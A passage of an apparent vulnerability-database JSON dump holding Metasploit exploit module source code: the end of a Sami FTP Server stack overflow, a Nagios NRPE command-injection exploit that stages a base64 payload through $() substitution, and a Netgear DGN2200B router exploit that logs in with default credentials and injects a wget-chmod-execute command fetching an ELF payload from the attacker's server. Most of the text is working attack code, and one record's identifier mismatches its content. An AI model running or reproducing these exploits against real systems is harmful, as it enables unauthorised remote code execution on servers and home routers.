This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.\n },\n 'Platform'\t\t => 'win',\n 'Author'\t\t =>\n [\n 'superkojiman', # Original exploit\n 'Doug Prostko <dougtko[at]gmail.com>' # MSF module\n ],\n 'License'\t\t => MSF_LICENSE,\n 'References'\t =>\n [\n [ 'OSVDB', '90815'],\n [ 'BID', '58247'],\n [ 'EDB', '24557']\n ],\n 'Privileged'\t => false,\n 'Payload'\t\t =>\n {\n 'Space' => 1500,\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x5c\",\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'Targets'\t\t =>\n [\n [ 'Sami FTP Server 2.0.1 / Windows XP SP3',\n {\n 'Ret' => 0x10028283, # jmp esp from C:\\Program Files\\PMSystem\\Temp\\tmp0.dll\n 'Offset' => 228\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 27 2013'))\n register_options(\n [\n OptAddress.new('SOURCEIP', [false, 'The local client address'])\n ])\n end\n\n def exploit\n connect\n if datastore['SOURCEIP']\n ip_length = datastore['SOURCEIP'].length\n else\n ip_length = Rex::Socket.source_address(rhost).length\n end\n buf = rand_text(target['Offset'] - ip_length)\n buf << [ target['Ret'] ].pack('V')\n buf << rand_text(16)\n buf << payload.encoded\n send_cmd( ['LIST', buf], false )\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T00:50:00", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 104}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. 
NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-25T03:09:02", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-07-25T03:09:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:850457", "OPENVAS:1361412562310865802", "OPENVAS:850460", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310121262"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "nessus", "idList": ["FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "ALA_ALAS-2013-203.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", 
"idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-25T03:09:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must 
be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << 
\"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", 
"metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T03:09:02", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 105}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "a4df64b95528f30e9d7136456938762e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Netgear DGN2200B pppoe.cgi Remote Command Execution", "description": "Some Netgear Routers are vulnerable to an authenticated OS command injection on their web interface. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module overwrites parts of the PPOE configuration, while the module tries to restore it after exploitation configuration backup is recommended.\n", "published": "2013-04-03T08:32:52", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.s3cur1ty.de/m1adv2013-015"], "cvelist": [], "lastseen": "2019-07-29T10:52:05", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2019-07-29T10:52:05"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:153782", "PACKETSTORM:153781", "PACKETSTORM:153772", "PACKETSTORM:153771", "PACKETSTORM:153770"]}, {"type": "cve", "idList": ["CVE-2019-10267", "CVE-2019-14284", "CVE-2019-14283", "CVE-2018-20855", "CVE-2018-20856", "CVE-2018-20854"]}, {"type": "thn", "idList": ["THN:5BC8F1A67A1CCC7511A6D85B8051C8F3"]}, {"type": "kitploit", "idList": ["KITPLOIT:694607214883016670"]}, {"type": "freebsd", "idList": ["38D2DF4D-B143-11E9-87E7-901B0E934D69"]}, {"type": "exploitdb", "idList": ["EDB-ID:47179", "EDB-ID:47181", 
"EDB-ID:47180"]}, {"type": "amazon", "idList": ["ALAS-2019-1252", "ALAS-2019-1246", "ALAS-2019-1244"]}], "modified": "2019-07-29T10:52:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Netgear DGN2200B pppoe.cgi Remote Command Execution',\n 'Description' => %q{\n Some Netgear Routers are vulnerable to an authenticated OS command injection\n on their web interface. Default credentials for the web interface are admin/admin\n or admin/password. Since it is a blind os command injection vulnerability, there\n is no output for the executed command when using the cmd generic payload. A ping\n command against a controlled system could be used for testing purposes. 
This module\n overwrites parts of the PPOE configuration, while the module tries to restore it\n after exploitation configuration backup is recommended.\n },\n 'Author' =>\n [\n 'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module\n 'juan vazquez' # minor help with msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'BID', '57998' ],\n [ 'EDB', '24513' ],\n [ 'OSVDB', '90320' ],\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-015' ]\n ],\n 'DisclosureDate' => 'Feb 15 2013',\n 'Privileged' => true,\n 'Platform' => %w{ linux unix },\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'CMD',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix'\n }\n ],\n [ 'Linux mipsbe Payload',\n {\n 'Arch' => ARCH_MIPSBE,\n 'Platform' => 'linux'\n }\n ],\n ],\n 'DefaultTarget' => 1\n ))\n\n register_options(\n [\n OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),\n OptString.new('HttpPassword', [ true, 'The password for the specified username', 'password' ]),\n OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),\n OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),\n OptInt.new('RELOAD_CONF_DELAY', [true, 'Time to wait to allow the remote device to load configuration', 45])\n ])\n end\n\n def get_config(config, pattern)\n if config =~ /#{pattern}/\n #puts \"[*] #{$1}\"\t#debugging\n return $1\n end\n return \"\"\n end\n\n def grab_config(user,pass)\n print_status(\"#{rhost}:#{rport} - Trying to download the original configuration\")\n begin\n res = send_request_cgi({\n 'uri' => '/BAS_pppoe.htm',\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n if res.nil? 
or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n if [200, 301, 302].include?(res.code)\n if res.body =~ /pppoe_username/\n print_good(\"#{rhost}:#{rport} - Successfully downloaded the configuration\")\n else\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported\")\n end\n else\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\n end\n\n @pppoe_username_orig = get_config(res.body, \"<td\\ align=\\\"right\\\"><input\\ type=\\\"text\\\"\\ name=\\\"pppoe_username\\\"\\ size=\\\"15\\\"\\ maxlength=\\\"63\\\"\\ value=\\\"(.*)\\\"><\\/td\")\n @pppoe_passwd_orig = get_config(res.body, \"<td\\ align=\\\"right\\\"><input\\ type=\\\"password\\\"\\ name=\\\"pppoe_passwd\\\"\\ size=\\\"15\\\"\\ maxlength=\\\"63\\\"\\ value=\\\"(.*)\\\"><\\/td\")\n @pppoe_servicename_orig = get_config(res.body, \"<td\\ align=\\\"right\\\"><input\\ type=\\\"text\\\"\\ name=\\\"pppoe_servicename\\\"\\ maxlength=\\\"63\\\"\\ size=\\\"15\\\"\\ value=\\\"(.*)\\\"><\\/td\")\n\n @runtest_orig = get_config(res.body, \"<input\\ type=\\\"hidden\\\"\\ name=\\\"runtest\\\"\\ value=\\\"(.*)\\\">\")\n @wan_ipaddr_orig = get_config(res.body, \"<INPUT\\ name=wan_ipaddr\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_localip_orig = get_config(res.body, \"<INPUT\\ name=pppoe_localip\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_dns_sel_orig = get_config(res.body, \"<INPUT\\ name=wan_dns_sel\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_dns1_pri_orig = get_config(res.body, \"<INPUT\\ name=wan_dns1_pri\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_dns1_sec_orig = get_config(res.body, \"<INPUT\\ name=wan_dns1_sec\\ type=hidden\\ 
value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr_sel_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr_sel\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr_def_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr_def\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr2_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr2\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_hwaddr_pc_orig = get_config(res.body, \"<INPUT\\ name=wan_hwaddr_pc\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @wan_nat_orig = get_config(res.body, \"<INPUT\\ name=wan_nat\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @opendns_parental_ctrl_orig = get_config(res.body, \"<INPUT\\ name=opendns_parental_ctrl\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_flet_sel_orig = get_config(res.body, \"<INPUT\\ name=pppoe_flet_sel\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_flet_type_orig = get_config(res.body, \"<INPUT\\ name=pppoe_flet_type\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @pppoe_temp_orig = get_config(res.body, \"<INPUT\\ name=pppoe_temp\\ type=hidden\\ value=\\ \\\"(.*)\\\">\")\n @apply_orig = get_config(res.body, \"<input\\ type=\\\"SUBMIT\\\"\\ name=\\\"apply\\\"\\ value=(.*)\\ onClick=\\\"return\\ checkData\\(\\)\\\">\")\n end\n\n def restore_conf(user,pass,uri)\n # we have used most parts of the original configuration\n # just need to restore pppoe_username\n cmd = @pppoe_username_orig\n print_status(\"#{rhost}:#{rport} - Asking the Netgear device to reload original configuration\")\n\n res = request(cmd,user,pass,uri)\n\n if (!res)\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Unable to reload original configuration\")\n end\n\n print_status(\"#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration\")\n select(nil, nil, nil, @timeout)\n end\n\n def request(cmd,user,pass,uri)\n begin\n\n #original post request\n #login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20COMMAND%20%26\n 
#&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5\n #&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen\n #&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0\n #&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0\n #&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05\n #&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0\n #&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0\n res = send_request_cgi(\n {\n 'uri'\t=> uri,\n 'method' => 'POST',\n 'authorization' => basic_auth(user,pass),\n 'encode_params' => false,\n 'vars_post' => {\n \"login_type\" => \"PPPoE%28PPP+over+Ethernet%29\",#default must be ok\n \"pppoe_username\" => cmd,\n \"pppoe_passwd\" => @pppoe_passwd_orig,\n \"pppoe_servicename\" => @pppoe_servicename_orig,\n \"pppoe_dod\" => \"1\",\t\t#default must be ok\n \"pppoe_idletime\" => \"5\",\t#default must be ok\n \"WANAssign\" => \"Dynamic\",\t#default must be ok\n \"DNSAssign\" => \"0\",\t\t#default must be ok\n \"en_nat\" => \"1\",\t\t#default must be ok\n \"MACAssign\" => \"0\",\t\t#default must be ok\n \"apply\" => @apply_orig,\n \"runtest\" => @runtest_orig,\n \"wan_ipaddr\" => @wan_ipaddr_orig,\n \"pppoe_localip\" => @pppoe_localip_orig,\n \"wan_dns_sel\" => @wan_dns_sel_orig,\n \"wan_dns1_pri\" => @wan_dns1_pri_orig,\n \"wan_dns1_sec\" => @wan_dns1_sec_orig,\n \"wan_hwaddr_sel\" => @wan_hwaddr_sel_orig,\n \"wan_hwaddr_def\" => @wan_hwaddr_def_orig,\n \"wan_hwaddr2\" => @wan_hwaddr2_orig,\n \"wan_hwaddr_pc\" => @wan_hwaddr_pc_orig,\n \"wan_nat\" => @wan_nat_orig,\n \"pppoe_flet_sel\" => @pppoe_flet_sel_orig,\n \"pppoe_flet_type\" => @pppoe_flet_type_orig,\n \"pppoe_temp\" => @pppoe_temp_orig,\n \"opendns_parental_ctrl\" => @opendns_parental_ctrl_orig\n }\n })\n return res\n rescue ::Rex::ConnectionError\n vprint_error(\"#{rhost}:#{rport} - Failed to connect to the web server\")\n return nil\n end\n end\n\n 
def logout(user,pass)\n begin\n res = send_request_cgi({\n 'uri' => '/LGO_logout.htm',\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n if res.nil? or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful logout possible\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\n end\n\n end\n\n def exploit\n downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))\n uri = '/pppoe.cgi'\n user = datastore['HttpUsername']\n pass = datastore['HttpPassword']\n @timeout = datastore['RELOAD_CONF_DELAY']\n\n #\n # testing Login\n #\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user} / #{pass}\")\n begin\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n if res.nil? or res.code == 404\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n if [200, 301, 302].include?(res.code)\n print_good(\"#{rhost}:#{rport} - Successful login #{user}/#{pass}\")\n else\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Failed to connect to the web server\")\n end\n\n grab_config(user,pass)\n\n if target.name =~ /CMD/\n if not (datastore['CMD'])\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - Only the cmd/generic payload is compatible\")\n end\n cmd = payload.encoded\n cmd = \"%26%20#{cmd}%20%26\"\n res = request(cmd,user,pass,uri)\n if (!res)\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Unable to execute payload\")\n else\n print_status(\"#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\")\n end\n return\n end\n\n #thx to Juan for his awesome work on the mipsel elf support\n @pl = generate_payload_exe\n @elf_sent = false\n\n #\n # start our 
server\n #\n resource_uri = '/' + downfile\n\n if (datastore['DOWNHOST'])\n service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri\n else\n #do not use SSL\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n #we use SRVHOST as download IP for the coming wget command.\n #SRVHOST needs a real IP address of our download host\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n datastore['SSL'] = true if ssl_restore\n end\n\n #\n # download payload\n #\n print_status(\"#{rhost}:#{rport} - Asking the Netgear device to download and execute #{service_url}\")\n #this filename is used to store the payload on the device\n filename = rand_text_alpha_lower(8)\n\n cmd = \"/usr/bin/wget #{service_url} -O /tmp/#(unknown);chmod 777 /tmp/#(unknown);/tmp/#(unknown)\"\n cmd = Rex::Text.uri_encode(cmd)\n cmd = \"%26%20#{cmd}%20%26\"\n res = request(cmd,user,pass,uri)\n if (!res)\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Unable to deploy payload\")\n end\n\n # wait for payload download\n if (datastore['DOWNHOST'])\n print_status(\"#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload\")\n select(nil, nil, nil, datastore['HTTP_DELAY'])\n else\n wait_linux_payload\n end\n register_file_for_cleanup(\"/tmp/#(unknown)\")\n\n #\n #reload original configuration\n #\n restore_conf(user,pass,uri)\n\n #\n #lockout of the device and free the management sessions\n #\n logout(user,pass)\n end\n\n # Handle incoming requests from the server\n def 
on_request_uri(cli, request)\n #print_status(\"on_request_uri called: #{request.inspect}\")\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n # wait for the data to be sent\n def wait_linux_payload\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...\")\n\n waited = 0\n while (not @elf_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\n end\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T10:52:05", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 106}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-29T13:09:56", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-07-29T13:09:56"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-29T13:09:56"}}, "objectVersion": "1.4", "sourceHref": 
